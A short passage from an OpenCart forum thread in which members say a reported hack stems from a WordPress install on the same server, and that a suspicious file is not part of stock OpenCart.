And yes, there is a wordpress blog installed on the same server!
It cannot be said often enough:
Never use Wordpress on the same server!

Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.


User avatar
Guru Member

Posts

Joined
Mon Jan 11, 2010 10:52 pm
Location - Austria

Post by IP_CAM » Tue Mar 10, 2020 3:03 am

catalog/controller/affiliate/image.php
is NOT a default OC File, it's therefore NOT an OC-related Problem ... ::) ;)
Just to tell that to readers, affraid of getting hacked, by reading such topics. 8)
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by OSWorX » Tue Mar 10, 2020 3:49 pm

As already written: it is only a problem of Wordpress!

OpenCart has nothing todo with that hack, it can be any other Shopsystem or CMS or anything else if Wordpress is on the same server.

Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.


User avatar
Guru Member

Posts

Joined
Mon Jan 11, 2010 10:52 pm
Location - Austria
Who is online

Users browsing this forum: No registered users and 79 guests